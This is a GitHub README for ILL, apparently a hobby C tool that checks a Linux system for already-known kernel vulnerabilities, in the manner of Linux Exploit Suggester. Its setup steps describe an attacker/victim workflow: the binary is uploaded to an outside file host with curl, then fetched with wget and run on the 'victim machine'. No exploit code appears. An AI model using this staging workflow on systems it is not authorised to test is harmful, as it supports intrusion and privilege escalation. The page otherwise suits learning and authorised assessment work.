Skip to content
/ ILL Public

🐧 I Love Linux (ILL) is a C tool developed to fast search for kernel vulnerabilities and suggest to the user

License

Notifications You must be signed in to change notification settings

oppsec/ILL

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

🐧 ILL (I Love Linux)

🐧 I Love Linux (ILL) is a C tool developed to fast search for kernel vulnerabilities and suggest to the user



What is ILL?

ILL is a projected that I developed to learn C, I got some inspiration from LSE (Linux Exploit Suggester) and tried to create something simular to it but, I still recommend you to use LSE. ILL, is a simple project to search for kernel already-know vulnerabilities.


⚡ Installing / Getting started

A quick guide of how to install and use ILL.

1. (attacker machine) https://github.com/oppsec/ILL.git
2. (attacker machine) gcc main.c -o ill
3. (attacker machine) curl -T ill temp.sh
4. (victim machine) wget http://temp.sh/example
5. (victim machine) chmod +x ill; ./ill

⚙️ Pre-requisites

  • GCC installed on your machine

✨ Features

  • Extremely fast
  • Low RAM and CPU usage
  • Made in C

Contributing

A quick guide of how to contribute with the project.

1. Create a fork from ILL repository
2. Download the project with git clone https://github.com/your/ILL.git
3. cd ILL/
4. Make your changes
5. Commit and make a git push
6. Open a pull request

⚠️ Warning

  • The developer is not responsible for any malicious use of this tool.

About

🐧 I Love Linux (ILL) is a C tool developed to fast search for kernel vulnerabilities and suggest to the user

Topics

Resources

License

Stars

Watchers

Forks

Languages